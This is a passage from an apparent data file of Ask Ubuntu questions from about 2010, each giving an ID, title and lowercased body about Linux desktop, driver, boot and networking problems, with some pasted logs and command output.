anywhere state related , established accept all -- anywhere anywhere state related , established accept tcp -- apkgs-ap-dynamic-145.136.165.59.airtelbroadband.in anywhere tcp dpt : ssh accept tcp -- apkgs-ap-dynamic-145.136.165.59.airtelbroadband.in anywhere tcp dpt:10000 accept tcp -- apkgs-ap-dynamic-145.136.165.59.airtelbroadband.in anywhere tcp dpt : mysql drop all -- anywhere anywhere chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain dynamichosts ( 937 references ) target prot opt source destination accept all -- telemedia-ap-dynamic-145.86.175.59.airtelbroadband.in anywhere here the airtelbroadband is mine ( dyndns domainname ) . i think the previously posted script creates new chain and from this domain everything is allowed -is it so ? . may be the allowed ports ssh , webmin , mysql and www are useless entries . but i want this domain should be allowed only to these ports and i may have nmap listing only allowed ports on the cloud server when i check from my dyndns domain systems . any more help ... ?
6007	qt applications drive my mouse crazy ?	today i upgraded to maverick , and tried to watch a movie with smplayer . after a while i stopped the movie and noticed that i could not use my mouse anymore . no left click , just middle and right clicks worked and i could not grab the focus of any window . this happened with vlc too , but does not happen with mplayer . i can only fix it whit logout/login . anyone faced this problem too ?
6009	where are icons stored ?	i want to change an icon of a specific theme . where do themes save their icons ?
6016	how to set monday as the first day of the week in gnome calendar applet ?	what is the recommended way to change the first day of the week to monday ( instead of sunday , as in the screenshot below ) ? i could n't find anything related in clock preferences , nor in system - > preferences , or system - > administration . this probably has something to do with tweaking locales , so here 's ( possibly relevant ) output from locale : lang=en_us.utf8 lc_ctype= '' en_us.utf8 '' lc_numeric= '' en_us.utf8 '' lc_time= '' en_us.utf8 '' ... lc_all= nb : i want to keep english as the ui language both in gnome and on command line . dates are currently displayed like this ( e.g . ls -l ) : 2010-10-06 15:32 , and i also want to keep that as it is .
6017	how to get docky to work like gnome-do ?	is there a way to get docky ton act like gnome-do ? i installed just the docky package . i would like it to be able to search for other things that are not in the dock . is this possible or would it just be easier to install gnome-do separate .
6021	is there a way to force a specific file to exist in ram only ?	i like this suggestion of mounting a tmpfs at /var/log in order to reduce disk writes . is there any way to do something similar for just a single file such as ~/.xsession-errors ? my incentive for asking comes from powertop , the program 'gnome-do ' is writing to file '.xsession-errors ' on /dev/sdb2 . this prevents the disk from going to powersave mode . but one could also conceivably want to do this in order to speed up an io-intensive program .
6023	what basic intepreters are available ?	was asked by a new ubuntu user - who also wants to learn about programming - what he could use to run basic code . he was working through a basic book before trying out ubuntu , and he 'd like to continue without having to switch back to windows . it looks like there are a few basic packages in the standard repositories , as well as projects like mono which may include some kind of basic support . what would be a good recommendation from the standard repositories - or from a deb package - for someone learning the basics of basic and new to ubuntu ?
6025	grub always fails to install , furthest i get is grub > prompt	tried to install 10.10 yesterday and eventually got an error that grub had failed to install . asked me to select another partition , cancel install or continue without a bootloader . everytime i selected another partition the error would just pop back up immediately ( not convinced it even tried writing anything to disk ) . i did do some partitioning when i was in the installer - shrunk an ntfs partition and grew the linux one to make up for it - the defaults were set to place at beginning of drive and logical ( as opposed to primary ) , so i left it with that . the first time grub just went to the recovery prompt - but most of the commands that were 'supposed ' to work , did n't ( been reading articles and how-tos ) . after another reinstall and an attempt to install manually i got through to the grub > prompt , but have failed to get much further . i 've checked the grub directory and there 's no grub.cfg anywhere , but it 's definitely 1.9x that 's installed . there should be no legacy grub installations anymore , that i 'm aware of . have gone through various methods to try and load a kernel or configure grub but they 've all been unsuccessful . for example : http : //ubuntuforums.org/showthread.php ? t=1195275 edit : sorry , you 're right , i should have been clearer , left a lot of space for assumptions there . was writing it while researching/rebooting . i have actually managed to work around it , but i will get back with that partition table 'cause i 'm pretty sure something is wrong somewhere - still unable to get the distro installer to install grub , as it should . using ubuntu linux . was failing to get past the grub > prompt because i was n't loading the initrd image . did that and i was flying . just ran update-grub once i got into ubuntu proper .
6033	enabling nvidia driver messes up splash screen	when you boot from live cd , or doing the first boot after installing ubuntu , splash screen looks awesome . but as soon as you enable nvidia-current driver , installed with apt-get , splash screen goes all crazy . with crazy i mean that resolution is very low , font ( i assume ) is very weird and it all looks like it 's been broken . this happened with 10.04 and now again with 10.10 . how do i fix splash screen after enabling nvidia drivers ?
6035	code snippet manager for ubuntu ?	i 'm looking for a good code snippet manager , with syntax highlighting and search capabilities . another important feature is the capability of changing the code area background color . i have tested some adobe air apps that had white background everywhere , which hurts my eyes . i 'm using kde btw . i use kate for coding , but i do n't like it 's snippet plugin .
6037	burg compatibility	is burg compatible with ubuntu 10.10 ? and if yes , are there any kind of errors that will appear if install it improperly ?
6042	how to bind keyboard layout in opengl game ?	how to bind in-game actions to hardware keys not to layout variables ? keys stops working when i randomly change them in game ( quake live or quake iii ) by alt+shift .
6045	weird symbols google	so my homepage look weird i do n't know why but since i start using ubuntu 10.10 the weird symbols appear any idea ? http : //i.stack.imgur.com/wl8df.jpg
6048	installing nvidia drivers causes computer to boot to command prompt	i have an asus u30jc laptop , which comes with the optimus prime graphics card switching technology that is now supported under 2.6.35 , so i decided to give it a try . first i made sure the discrete graphics card was activated and then i installed the drivers proposed by the ubuntu software repository ( nvidia-current ) . however , after rebooting all i got was a command prompt . my graphics card is a nvidia 310m . this is on ubuntu 10.10 64 bits . what can i do to diagnose/identify the source of this problem ? update : the messsages in my syslog tell me to check the xorg log : oct 11 12:42:59 u30jc-test gdm-binary [ 1095 ] : warning : gdmdisplay : display lasted 0.053144 seconds oct 11 12:42:59 u30jc-test gdm-simple-slave [ 1450 ] : warning : unable to load file '/etc/gdm/custom.conf ' : no such file or directory oct 11 12:42:59 u30jc-test gdm-binary [ 1095 ] : warning : gdmdisplay : display lasted 0.038176 seconds oct 11 12:42:59 u30jc-test gdm-binary [ 1095 ] : warning : gdmlocaldisplayfactory : maximum number of x display failures reached : check x server log for errors which i did . i found this message in my /var/log/xorg.0.log : fatal server error : [ 113.540 ] no screens found [ 113.540 ] what does that mean ?
6051	how to install windows media player plugin on chromium ?	there is a website that streams local tv and it requires windows media player plugin . i have lubuntu freshly installed , but it simply says `` missing plug-in '' . it does n't say anything about what packages i need to install . what 's the right package/s to install ?
6055	what does this `` canonical does not provide updates ... '' mean in my package manager ?	in both synaptic package manager and ubuntu software center , i sometimes see the following footnote . canonical does not provide updates for deja-dup . some updates may be provided by the ubuntu community . does this mean that these packages are not automatically updated as new versions are released ? ... or does it just mean that canonical plays no part in the development of the particular app . ... or does it mean something else ? do i need to monitor and manage the installation of latest releases myself ?
6059	how do i know if oneconf is working ?	i 've just switched to ubuntu 10.10 from jolicloud 1.0 and i 'm very impressed so far ! only thing i 'm not too sure about is oneconf . i 've installed it from the software centre and under file / inventory on ubuntu one both boxes are checked and i 'm signed in . but how do i know it 's working ? and how would i resync my installed programs to a fresh installation ? next to `` share this computer 's inventory '' it says `` unknown '' even though the box is checked . thanks
6061	gwibber and the messaging menu	i would like to make gwibber use the messaging menu in ubuntu 10.10 . gwibber is running , there is an arrow near 'broadcast ' item , but i do n't see recent tweets on the list , i just see notify osd notifications ... what can i do to make it work ? : )
6068	terminal font is buggy	after my fresh install of ubuntu 10.10 , i noticed that the terminal 's font is smashed together and altogether awful-looking . does anyone have a solution or workaround ? i 've been trying to find one for a few days . : (
6071	fix crackling audio with pidgin internet messenger	i 've recently switched from empathy to pidgin as my im client , but i 've noticed the notification sounds pidgin plays on events like a contact signing in crackle . i 've never had such problems with any other sound on ubuntu , but pidgin seems to have a problem with my audio setup . i 'm running ubuntu 10.10 . thanks for your help .
6075	vga for external monitor is flickering	i use the dell vostro 3300 und ubuntu lucid 10.10 . the problem was on 10.04.1 too . the vga for the external monitor is flickering . the problem seams to be the intel gma x4500hd . so , do you know 1 . ) what i can do ? or 2 . ) where i can find a driver for the intel gma x4500hd - maybe a deb package , because i am a absolute beginner .
6076	i need a copy of the default /etc/apt/sources.list	i upgraded to the rc some time ago and the sources.list is sort of screwed up , meaning i 'm getting a lot of 404 's when updating . could someone please post an original sources.list for maverick ?
6078	are the ralink rt3090 drivers incompatible with ubuntu 10.10 ?	ralink technology publishes their drivers in source code form on their website here . when complied with make and make install in 10.04 , the drivers worked well in 32 and 64 bit versions of lucid . however , when compiled for the 64 bit version of maverick , it does not work at all , and 32 bit maverick , it works but randomly disconnects . both versions of maverick say `` [ proprietary ] driver is activated but not in use '' in the proprietary drivers dialog . do the drivers just need to be updated ? is there an easy fix ?
6090	netconsole wo n't start , says `` wlan0 does n't exist , aborting ''	i 'm trying to setup netconsole to debug a hard lock up , and i am running into a problem . i have the following config for netconsole : options netconsole netconsole=6666 @ 192.168.1.114/wlan0,6666 @ 192.168.1.105/00:1e : d2 : c4:72:54 during bootup i get the following spew : [ 5.256569 ] netconsole : local port 6666 [ 5.256570 ] netconsole : local ip 192.168.1.114 [ 5.256571 ] netconsole : interface wlan0 [ 5.256572 ] netconsole : remote port 6666 [ 5.256572 ] netconsole : remote ip 192.168.1.105 [ 5.256573 ] netconsole : remote ethernet address 00:1e : d2 : c4:72:54 [ 5.256574 ] netconsole : wlan0 does n't exist , aborting . [ 5.256575 ] netconsole : cleaning up not exactly sure what to do from here , any suggestions welcome . edit output of ip l for maco : 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2 : eth0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc pfifo_fast state down qlen 1000 link/ether 00:1f : bc:09:45 : b5 brd ff : ff : ff : ff : ff : ff 3 : eth1 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc pfifo_fast state down qlen 1000 link/ether 00:1f : bc:09:45 : b6 brd ff : ff : ff : ff : ff : ff 4 : wlan0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 00:14:6c:85 : ad : fa brd ff : ff : ff : ff : ff : ff edit output of dmesg after modprobe error for kees : [ 4557.261569 ] netconsole : local port 6666 [ 4557.261573 ] netconsole : local ip 192.168.1.114 [ 4557.261576 ] netconsole : interface wlan0 [ 4557.261577 ] netconsole : remote port 6666 [ 4557.261580 ] netconsole : remote ip 192.168.1.105 [ 4557.261582 ] netconsole : remote ethernet address 00:1e : d2 : c4:72:54 [ 4557.261585 ] netconsole : wlan0 does n't support polling , aborting . [ 4557.261587 ] netconsole : cleaning up
6091	how to get media card reader in nv52 gateway to work ?	does anyone know how to get a built-in media card reader to work in ubuntu 10.10 ? my laptop is a gateway nv52 .
6092	how to update from 10.04 to 10.10 ?	what is the simplest method to completely upgrade your existing 10.04 install to get the updates and packages from the 10.10 distribution ? disregarding the fact that you get the latest packages , i would like to see the package paths change to the newer version .
6097	multitouch on acer aspire 4740	how can i enable multi touch in ubuntu 10.10 for my acer aspire 4740 notebook ? screen 14.1-inch glossy led-backlit 1366x768 res cpu intel core i5-430m 2.26ghz ram 1gb ddr3 hdd 320gb graphics onboard intel gma hd usb ports 3 dvd writer yes gigabit ethernet yes wi-fi 802.11 b/g/n hdmi/esata/firewire yes/no/no multicard reader yes expresscard slot no
6099	is it possible to consistently integrate kontact in gnome ?	for many reasons i like kontact much beter as pim application vs evolution . but i ca n't find any help on how to integrate the different parts into the gnome environment . kmail as default mailer ( that 's possible ) and use the indicator applet tomboy or basket to be used as replacement for knotes . at least sync . kadrressbook to replace gnome adressbook ... kcalendar replace calendar ... is this possible by any means ? ( and if it is , how ? ) thx , piedro
6100	can i allocate 'free space ' on my harddrive to a partition ?	during 10.10 installation i deleted a 30gb partition and changed it to a 2gb swap , and then reinstalled ubuntu over partition two ( where 10.04 was ) . i have a third large partition where most of my files are . how do i allocate the newly freed up 28gb or so from the first partition and allocate it to the third partition ?
6101	console text appears on shutdown	i updated to 10.10 from 10.04 -however not with a clean install but with online update . since then at shutdown some console texts appear ( next to the red spot representing the shutdown steps ) . im using the nvidia driver from nvidia.com . can you suggest something ?
6107	how do i install drivers for a canon lbp-2900 printer ?	i seen many times how people describe how to 's about lbp-2900 , and 10-12 steps from start to end of how to download , unpack , build driver , fix driver , make it work ... could be there some .deb package with ready-to-go driver for ubuntu ? this printer is very popular ...
6109	is there a way to force scrollbars in the desktop version of ubuntu , like netbook remix does ?	i 'm not a particular fan of ubuntu netbook remix , but the one feature i miss is the ability for a window taller than the vertical pixel length exists , it automatically adds a scrollbar . can i add this ui tweak to the standard version of ubuntu ? i ca n't see half of my okay buttons in settings screens !
6114	what does the name after ' @ ' at terminal prompt mean ?	i noticed that when in terminal the prompt is generally in the format username @ users : or i have even seen username @ ( none ) : . i get that the first part is the logged in person 's user name , but what is the part after the @ symbol ?
6121	how to browse by albumartist with rhythmbox or any other gnome musicplayer ?	rhythmbox offers ( as it should by now ! ) the metatag `` albumartist '' in addition to `` artist '' . but i do n't see any way to browse by this property . the offered views are : browse by `` artist - album '' , `` genres - artist '' , `` genre - artist - album '' . how can another view like `` genre - albumartist - album '' be added ? ( this is the way itunes sorts , makes a lot of sense if you have about 220 compilation albums with a lot of `` one hit wonder '' -artists ! ) ca n't be that difficult , can it ? in case it 's impossible , - is it possible to completely replace rhythmbox with another application that 's able to do the above ( which one ? ) ? thx for reading , piedro
6122	how to see what 's going on during shutdown	since a few weeks , ubuntu freezes almost everytime when i shut it down . i know it because the shutdown animation stops and nothing is responsive : ctrl+alt+del or altgr+syst+reisub do n't make any difference . i have tried to look at various log files in /var/log but only info level message are logged . my hope to solve this problem would be to do a verbose shutdown , one where i could see what 's going on , and so what 's causing the problem , so i could start solving it . therefore , as the title suggest it . is there a way to see what 's going on during shutdown ? i could even go to the extreme of doing a step-by-step shutdown if this is the only way . thanks for any tips .
6124	how to install proprietary drivers via cdrom on a netbook ?	i need to install the internet card drivers on my netbook the problem is that it dosent have cd tray so i ca n't install them via the cd or atleast i dont know where to mount the iso so ubuntu recognizes it so i can put the proprietary drivers . so is there any other way ? or where can i mount the iso ? thanks !
6126	how do i open indesign cs5 files ?	this post may seem like a duplicate from my other post , `` is is possible to export inkscape files for indesign ? '' but this completely different . i need to open my indesign cs5 files in ubuntu but i ca n't seem to find a free vector program that can open indesign files ( or files exported by indesing cs5 ) please note that i ca n't work with a bitmap or a layer merged vector .
6129	why does my ethernet port sometimes not work ?	i 've noticed that my ethernet port works fine once , but after it 's disconnected and i connect to a wireless network and i go and try to plug the ethernet port back in , it does n't work until i reboot . why is this ? ! also , the lights light up but it 's like the ubuntu does n't see it . is there a way to reboot the ethernet port programmaticly through terminal ? i 've also tried to delete and readd auto ethernet through the network preferences . i have a lenovo thinkpad l512 with ubuntu 10.04 ==update== i did the first step maco said to do and here is what i got : oscargodson @ ubuntu : ~ $ sudo service network-manager stop [ sudo ] password for oscargodson : network-manager stop/waiting oscargodson @ ubuntu : ~ $ sudo ifconfig eth0 up siocsifflags : can not allocate memory oscargodson @ ubuntu : ~ $ sudo dhclient eth0 internet systems consortium dhcp client v3.1.3 copyright 2004-2009 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ siocsifflags : can not allocate memory siocsifflags : can not allocate memory listening on lpf/eth0/60 : eb:69:02:50 : f0 sending on lpf/eth0/60 : eb:69:02:50 : f0 sending on socket/fallback receive_packet failed on eth0 : network is down dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 send_packet : network is down dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 4 send_packet : network is down dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 6 send_packet : network is down dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 11 send_packet : network is down dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 17 send_packet : network is down dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 17 send_packet : network is down dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 send_packet : network is down no dhcpoffers received . no working leases in persistent database - sleeping . i 've tried everything maco suggested and finally figured out my memory is n't low although i keep getting a siocifflags : can not allocate memory error . i have over 1gb of ram free as we speak . i found this page : http : //www.linuxquestions.org/questions/linux-newbie-8/weird-ethernet-problem-838220/ and did what the person there said which was : lspci| grep -i ethernet dmesg | grep -i ethernet and it gave me some output and the last command gave me : r8169 gigabit ethernet driver 2.3lk-napi loaded i then tried maco 's stuff again and i did n't get the error anymore , however , the ethernet still does n't connect although now it does n't give me the memory allocation error .
6132	where is the network manager docklet in docky in meerkat ?	is there a network manager docklet shipped with docky ? if not , how can i add one ?
6134	how to map ctrl/shift to thumb buttons of mouse ?	i have an microsoft sidewinder x8 mouse and i wish to use 8 for shift and the 9 for control . can anybody please tell me how ?
6135	what are the alternatives to os x 's spotlight ?	one of the things i like best when using os x is the spotlight tool . you can click a magnifying glass in the corner , and search for apps , files , anything . windows 7 's start menu search tool is similar . does ubuntu have anything like this ? gnome do has some similarities , but it 's really more about doing things than searching for things . something with a panel applet like spotlight would be ideal .
6136	empathy can not connect to msn account	i 've just installed maverick , and while it seems to work so far , empathy is unable to connect to my msn account . i 've verified that pidgin can connect . i 've tried looking at the empathy debug log , but all i see is : starting butterfly 0.5.14 : telepathy-python 0.15.17 , papyon 0.5.1 failed to create connection any suggestions as to what 's going on here , and how to fix it ?
6137	saving monitor settings ?	is there a way to save my monitor settings ? i have an external monitor at work , but each morning i have to plug it in , rearrange the windows from being side by side to being on top of each other . can i just save this ?
6147	how to delete gnome panel ?	i am trying to get rid of my gnome panels so that i can go to a purely docky/gnome-do environment . i have got rid of everything , except for a single remaining panel which i can not delete . the text `` delete this panel '' is greyed out - any pointers about how to get rid of it ?
6149	updating a rules file so it wo n't be overwritten on update	due to current issues with logitech bluetooth devices , i need to update the /lib/udev/rules.d/70-hid2hci.rules file . a few weeks ago , an update overwrote this file ( with an attempted fix that did n't , for many , work ) , and it took a while for me to realise why my mouse and keyboard stopped working again . i have memories of being able to store an overriding rules file to a usr directory that will be checked before the lib file , but ca n't remember the specifics . could someone please jog my memory .
6156	how compatible is wine with windows as of today ?	observation shows that some windows softwares run perfectly on wine and some just fail miserably . rather than trying them out randomly , i wanted to create a place where we can have some ideas about wine-suitable , and -unsuitable , softwares . so , exactly which areas of windows operating systems does wine fully support or still show weaknesses ? by implication , what are the kinds of windows applications that are guaranteed to run without flaws on wine ?
6162	sound & broadcast icons missing ?	i had the sound icon in the main menu bar up top , along with the default broadcast icon up there . all of a sudden they are missing and i ca n't find them . i ca n't find them in the add to panel menu either . how do i get them back ?
6168	recording from line-in stops working after a while	right after boot up , i can record using the line input just fine , but after some time ( i have n't been able to tell how much ) , it stops working . all it records is silence with a bit of static . i do n't think the program is the culprit since i 've tried arecord and audacity . what could be the reason ? and how could i debug this ?
6171	`` can not mount /dev/loop0 '' during install from cd	whenever i boot up my pc from the cd , it starts shows the ubuntu logo with the loading sign and then gives me this error : can not mount /dev/loop0 ( /cdrom/casper/filesystem/squashfs ) om //filesystem squashfs i tried downloading and burning the iso again but i got the same problem . i also tried using a ubuntu 10.04 lucid lynx cd but it shows the same error too . it happens on 2 pcs , one with 512 mb ram and the other with 2 gb ram . the same cd works flawlessly on my laptop . error while installing ubuntu from cd `` can not mount /dev/loop0 ( /cdrom/casper/filesystem/squashfs ) om //filesystem squashfs ''
6175	what is the difference between the alternative and desktop cd images ?	i would like to know what the difference is between these two versions of the same distro . ubuntu-10.10-alternate-i386.iso ubuntu-10.10-desktop-i386.iso i think that the alternative cd is not live , but is there any more to it ?
6176	how do i upgrade from x86 to x64 without losing settings ?	is there an easy way to upgrade the system to x64 from x86 without losing settings and having to repartition etc ?
6192	how do work the dell studio 1537 's remote control with infrared receiver port it8512 cir	i use ubuntu 10.10 . please can someone help me ? the remote control is the only component that does not work with ubuntu . @ martin many thanks for your answer and excuse me for the delay . i have test the lirc driver ite8709 , but it not working properly . i add my result with the lirc in official repository . lino @ lino-studio-1537 : ~ $ lsmod | grep -i lirc lirc_ite8709 6328 0 lirc_dev 11209 1 lirc_ite8709 lino @ lino-studio-1537 : ~ $ dmesg | grep -i lirc [ 17.698130 ] lirc_dev : ir remote control driver registered , major 249 [ 17.740420 ] lirc_ite8709 : module is from the staging directory , the quality is unknown , you have been warned . lino @ lino-studio-1537 : ~ $ sudo mode2 -d /dev/lirc0 mode2 : could not get file information for /dev/lirc0 mode2 : default_init ( ) : no such file or directory and the command cat /proc/ioports | grep -i lirc produces nothing . long time ago i have read end test this thread in ubuntu forum and i had more results . i 've downloaded the file for dell 1535 and all commands entered above give me positive results . except irw that not working . i think that the problem is in the driver ite8709 . i hope that someone can help me to solve this problem .
6197	trick installer to use btrfs root with compression	i want to install maverick onto a btrfs root partition . not for fun or testing , but because i need compression due to a small flash disk ( 4gb ) . now the 10.10 installer finally supports btrfs , but there is no way to enable the compress flag in it . can i trick the installer somehow ? for old versions and getting luks you could pre-mount partitions . or is there an easy monkeypatch possible to enable btrfs+compress pre install ?
6198	turn off thumbnails for desktop icons	how do you turn off the thumbnails for desktop icons ? edit following oli 's answer : is it possible to do this for the desktop icons without affecting the normal behaviour of the nautilus file manager ?
6200	how do i open visio files ?	it is possible to open microsoft visio files in ubuntu ? perhaps something like dia , or openoffice draw ? it is not an emergency , but it would be nice ...
6201	why does n't `` rvm install ruby-head '' do anything ?	i just clean installed my ubuntu 10.10 , then i installed some necessary packages and then rvm , but when i write the rvm install ruby-head command , then it 's just like y press enter on the shell , nothing happens , even a error message , what could be happening ?
6206	how to disable the notebook touch pad when a wireless usb mouse is connected	i have a logitech mx anywhere wireless usb mouse which works very well with ubuntu . however , i would like to disable the touch pad when this mouse is connected . i keep hitting the touch pad with my wrist or thumb and cause the mouse to move to another part of the screen . i am constantly fixing typos . i 've had this problem since i installed ubuntu 9.10 . i 'm not sure if it is because the biometrics is part of the touchpad , the way the device is built into the system , or the bios which does not let me disable it .
6211	where can i find a precompiled gcc 3.4.6 or 2.95 arm cross-compiler ?	i need to rebuild a very old linux 2.4 kernel for an arm device . said kernel will ( as far as i know ) not build correctly with gcc 4 . so i need an older compiler for it . unfortunately none of my sources for precompiled compiler packages contain anything older than about 4.4 any more -- - i 've looked at codesourcery , emdebian and scratchbox . i 've tried compiling it myself , but while i 've managed to figure out how to build gcc 4 ( the instructions on how to do so i wrote up is one of the most popular on my website ... ) gcc 3 is beyond me , just failing with incomprehensible erros ; and gcc 2.95 is so infamously hard to compile that i have n't even tried . surely somebody must have a source for precompiled packages that work on ubuntu ! i 'm using maverick .
6217	disabling assistive technologies during login	i have a laptop with ubuntu 10.04 . my daughter was playing with the keyboard on the login screen , and it seems she activated some assistive technologies because now the screen is split vertically and the right side shows a magnified version of the left side . plus , there 's a screen keyboard . the way the screen is split makes it impossible for me to disable the assistive stuff from the toolbar at the bottom , since i can only see part of it . i do n't know if it 's a bug or what , because i 'd guess i could see the entire bar on the right ( magnified ) side just by moving the mouse there , but i ca n't . i ca n't even type on the login screen , nor use the on-screen keyboard ... good thing i have auto-login activated , so i can still use the computer , but i ca n't switch users . so , does anyone know how to get the normal login screen back ?
6228	how to get `` smooth scrolling '' system-wide ?	i found an amazing extension for google chrome called smoothscroll . it makes scrolling webpages extraordinarily visually appealing , just like in opera . i was wondering if i could find something like this for ubuntu that can be applied system wide so that i can experience this on any scrollbar i use .
6229	can i run osx applications ?	just wondering , are there any projects like wine , but for mac software ? that is , can we use a program that acts like a compatibility layer to run mac apps ?
6230	how to setup my box for dvd-ram media packetwriting ?	i ca n't find any information that 's more recent than 2 years on how to setup packetwriting for my dvd-ram drive . i like dvd-rams for reliable backups and hope to set it up correctly . i tried with some outdated how-tos which resulted in messing up a lot because there was no udev back then ! how can i achieve this setup in the latest ubuntu ?
6236	no network connectivity with realtek 8111d	so i built a new computer a couple months ago and installed windows 7 and ubuntu 10.04 on it . it has a gigabyte motherboard which has a realtek 8111d onboard network card . in windows , networking works fine . if i switch to ubuntu , i have no network connectivity whatsoever , and in order to boot windows , i have to leave my computer off for a minute or two in order for networking to work after having ubuntu running . since ubuntu by default installs the r8169 driver for my network card , i 've tried installing the r8168 driver , since that 's supposedly the correct driver for my card . it has n't helped . i installed 10.10 today ( a fresh install ) , hoping that 'd fix the problem . it did n't , so i checked lsmod , which showed the r8169 driver installed again . so i try installing the r8168 driver ( according to these instructions ) and it installs without any problems . i shut off my computer and unplug it , then go do some homework for 10 or 15 minutes . i come back , hoping the combination of the new driver and being powered off for a while have fixed it . alas , no luck . i would post the outputs of various commands , but because of the above issues , it 's rather difficult . however , if they 're absolutely necessary , i can do so . so , any help that could be provided would be great .
6237	is there any way to get autohotkey or ironahk working ?	i am very interested in getting autohotkey , the windows program for automation of keystrokes , working under ubuntu . so far i have installed wine , but am unable to use any of my previous windows scripts . are there any recommendations ?
6248	how to properly configure the audio ?	if i connect my headphones the speaker still work is that a bug ? or that suppose to happen just like that that never happen to me before .
6249	wine menu directory location ?	using the menu editor i accidentally deleted the wine menu . now i am stuck with the application installed and no way to easily use parts of it . i tried reinstalling it , many times , and still the menu does not show up . i think that a directory exists where the menu is at , but it is just marked off as deleted . can anyone point me to this directory or tell me another way to get the wine menu back ?
6252	exporting encrypted folders for nfs	have used nfs for quite a while on 9.10 and 10.04 to access folders on pcs on the lan . i recently chose the 'encrypt home partition ' option when installing ubuntu 10.04 on a new pc . now when i attempt to export a folder that is on the encrypted home partition , exports throws up a message that the folder can not be exported . i have searched the web high and low and found a couple of other users with the same problem , but no resolution . i can successfully export folders that are not on encrypted partitions . is nfs not compatible with folders on ubuntu encrypted home partitions ?
6253	what 's the difference between google chrome and/or chromium ? what are the advantages/disadvantages to each ?	i used google chrome in windows , and am now using chromium in ubuntu . is there any difference to the two programs ? what are the advantages and disadvantages to each program ? which one seems better ?
6263	how can i install ubuntu on an ipad ?	i 'd love to install ubuntu as a standard standalone on my ipad , is there any way to do so ?
6265	how do i install parallels guest tools on maverick ?	i 'm trying out maverick in a parallels 6 vm , and running into some trouble with the installation script for the guest tools : start installation or upgrade of guest tools installed guest tools were not found perform installation into the /usr/lib/parallels-tools directory cat : /usr/lib/parallels-tools/kmods/../version : no such file or directory start installation of prl_eth kernel module make : entering directory `/usr/lib/parallels-tools/kmods' cd prl_eth/pvmnet & & make make [ 1 ] : entering directory `/usr/lib/parallels-tools/kmods/prl_eth/pvmnet' make -c /lib/modules/2.6.35-22-generic/build m=/usr/lib/parallels-tools/kmods/prl_eth/pvmnet make [ 2 ] : entering directory `/usr/src/linux-headers-2.6.35-22-generic' ld /usr/lib/parallels-tools/kmods/prl_eth/pvmnet/built-in.o cc [ m ] /usr/lib/parallels-tools/kmods/prl_eth/pvmnet/pvmnet.o ld [ m ] /usr/lib/parallels-tools/kmods/prl_eth/pvmnet/prl_eth.o building modules , stage 2 . modpost 1 modules warning : modpost : missing module_license ( ) in /usr/lib/parallels-tools/kmods/prl_eth/pvmnet/prl_eth.o see include/linux/module.h for more information cc /usr/lib/parallels-tools/kmods/prl_eth/pvmnet/prl_eth.mod.o ld [ m ] /usr/lib/parallels-tools/kmods/prl_eth/pvmnet/prl_eth.ko make [ 2 ] : leaving directory `/usr/src/linux-headers-2.6.35-22-generic' make [ 1 ] : leaving directory `/usr/lib/parallels-tools/kmods/prl_eth/pvmnet' cd prl_tg/toolgate/guest/linux/prl_tg & & make make [ 1 ] : entering directory `/usr/lib/parallels-tools/kmods/prl_tg/toolgate/guest/linux/prl_tg' make -c /lib/modules/2.6.35-22-generic/build subdirs=/usr/lib/parallels-tools/kmods/prl_tg/toolgate/guest/linux/prl_tg srcroot=/usr/lib/parallels-tools/kmods/prl_tg/toolgate/guest/linux/prl_tg modules make [ 2 ] : entering directory `/usr/src/linux-headers-2.6.35-22-generic' cc [ m ] /usr/lib/parallels-tools/kmods/prl_tg/toolgate/guest/linux/prl_tg/prltg.o ld [ m ] /usr/lib/parallels-tools/kmods/prl_tg/toolgate/guest/linux/prl_tg/prl_tg.o building modules , stage 2 . modpost 1 modules warning : modpost : missing module_license ( ) in /usr/lib/parallels-tools/kmods/prl_tg/toolgate/guest/linux/prl_tg/prl_tg.o see include/linux/module.h for more information warning : modpost : found 3 section mismatch ( es ) . to see full details build your kernel with : 'make config_debug_section_mismatch=y' cc /usr/lib/parallels-tools/kmods/prl_tg/toolgate/guest/linux/prl_tg/prl_tg.mod.o ld [ m ] /usr/lib/parallels-tools/kmods/prl_tg/toolgate/guest/linux/prl_tg/prl_tg.ko make [ 2 ] : leaving directory `/usr/src/linux-headers-2.6.35-22-generic' make [ 1 ] : leaving directory `/usr/lib/parallels-tools/kmods/prl_tg/toolgate/guest/linux/prl_tg' cp -f prl_tg/toolgate/guest/linux/prl_tg/*.symvers prl_fs/sharedfolders/guest/linux/prl_fs || : cd prl_fs/sharedfolders/guest/linux/prl_fs & & make make [ 1 ] : entering directory `/usr/lib/parallels-tools/kmods/prl_fs/sharedfolders/guest/linux/prl_fs' make -c /lib/modules/2.6.35-22-generic/build m=/usr/lib/parallels-tools/kmods/prl_fs/sharedfolders/guest/linux/prl_fs make [ 2 ] : entering directory `/usr/src/linux-headers-2.6.35-22-generic' ld /usr/lib/parallels-tools/kmods/prl_fs/sharedfolders/guest/linux/prl_fs/built-in.o cc [ m ] /usr/lib/parallels-tools/kmods/prl_fs/sharedfolders/guest/linux/prl_fs/super.o cc [ m ] /usr/lib/parallels-tools/kmods/prl_fs/sharedfolders/guest/linux/prl_fs/inode.o cc [ m ] /usr/lib/parallels-tools/kmods/prl_fs/sharedfolders/guest/linux/prl_fs/file.o /usr/lib/parallels-tools/kmods/prl_fs/sharedfolders/guest/linux/prl_fs/file.c:389 : error : âsimple_sync_fileâ undeclared here ( not in a function ) make [ 3 ] : *** [ /usr/lib/parallels-tools/kmods/prl_fs/sharedfolders/guest/linux/prl_fs/file.o ] error 1 make [ 2 ] : *** [ _module_/usr/lib/parallels-tools/kmods/prl_fs/sharedfolders/guest/linux/prl_fs ] error 2 make [ 2 ] : leaving directory `/usr/src/linux-headers-2.6.35-22-generic' make [ 1 ] : *** [ all 